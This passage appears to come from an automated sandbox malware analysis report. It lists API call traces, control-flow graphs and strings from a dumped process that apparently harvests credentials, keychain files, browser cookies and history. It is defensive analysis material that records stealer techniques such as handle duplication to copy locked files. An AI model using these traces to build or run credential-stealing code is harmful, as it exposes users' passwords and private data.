                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                                                                                                                                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                                                                  • API String ID: 2745753283-3798722523
                                                                                                                                                                                                                                                                  • Opcode ID: 8320a57399db62c9384808c231969f658b87241fbcb6c2f23815a8bc87aa57e2
                                                                                                                                                                                                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8320a57399db62c9384808c231969f658b87241fbcb6c2f23815a8bc87aa57e2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                                                                  • API String ID: 2744995895-28296030
                                                                                                                                                                                                                                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040BB66
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                                                                                                                                                                                                  • String ID: chp$v10
                                                                                                                                                                                                                                                                  • API String ID: 170802307-2783969131
                                                                                                                                                                                                                                                                  • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                                                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 530 40e497-40e49f ??3@YAXPAX@Z 524->530 530->509 543 40e3d0-40e3d6 541->543 544 40e3d9-40e3de 541->544 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 543->544 547 40e3e0-40e3f1 memcpy 544->547 548 40e3f4-40e3f9 544->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 553 40e3c3-40e3c6 550->553 551->552 554 40e416-40e427 memcpy 552->554 555 40e42a-40e42f 552->555 553->541 554->555 556 40e431-40e442 memcpy 555->556 557 40e445-40e44a 555->557 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040E407
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040E422
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040E43D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                                                                                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                                                                  • API String ID: 3073804840-2252543386
                                                                                                                                                                                                                                                                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                                                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                                                                  • String ID: bhv
                                                                                                                                                                                                                                                                  • API String ID: 327780389-2689659898
                                                                                                                                                                                                                                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 618 413f4f-413f52 619 413fa5 618->619 620 413f54-413f5a call 40a804 618->620 622 413f5f-413fa4 GetProcAddress * 5 620->622 622->619
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                                                  • API String ID: 2941347001-70141382
                                                                                                                                                                                                                                                                  • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                                                                                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 623 4466f4-44670e call 446904 GetModuleHandleA 626 446710-44671b 623->626 627 44672f-446732 623->627 626->627 628 44671d-446726 626->628 629 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 627->629 630 446747-44674b 628->630 631 446728-44672d 628->631 636 4467ac-4467b7 __setusermatherr 629->636 637 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 629->637 630->627 635 44674d-44674f 630->635 631->627 634 446734-44673b 631->634 634->627 638 44673d-446745 634->638 639 446755-446758 635->639 636->637 642 446810-446819 637->642 643 44681e-446825 637->643 638->639 639->629 644 4468d8-4468dd call 44693d 642->644 645 446827-446832 643->645 646 44686c-446870 643->646 649 446834-446838 645->649 650 44683a-44683e 645->650 647 446845-44684b 646->647 648 446872-446877 646->648 654 446853-446864 GetStartupInfoW 647->654 655 44684d-446851 647->655 648->646 649->645 649->650 650->647 652 446840-446842 650->652 652->647 656 446866-44686a 654->656 657 446879-44687b 654->657 655->652 655->654 658 44687c-446894 GetModuleHandleA call 41276d 656->658 657->658 661 446896-446897 exit 658->661 662 44689d-4468d6 _cexit 658->662 661->662 662->644
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2827331108-0
                                                                                                                                                                                                                                                                  • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                                                                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                                                                                                  • String ID: visited:
                                                                                                                                                                                                                                                                  • API String ID: 1157525455-1702587658
                                                                                                                                                                                                                                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 689 40e175-40e1a1 call 40695d call 406b90 694 40e1a7-40e1e5 memset 689->694 695 40e299-40e2a8 call 4069a3 689->695 697 40e1e8-40e1fa call 406e8f 694->697 701 40e270-40e27d call 406b53 697->701 702 40e1fc-40e219 call 40dd50 * 2 697->702 701->697 707 40e283-40e286 701->707 702->701 713 40e21b-40e21d 702->713 709 40e291-40e294 call 40aa04 707->709 710 40e288-40e290 ??3@YAXPAX@Z 707->710 709->695 710->709 713->701 714 40e21f-40e235 call 40742e 713->714 714->701 717 40e237-40e242 call 40aae3 714->717 717->701 720 40e244-40e26b _snwprintf call 40a8d0 717->720 720->701
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                                                                  • API String ID: 3883404497-2982631422
                                                                                                                                                                                                                                                                  • Opcode ID: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                                                                                                                                                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
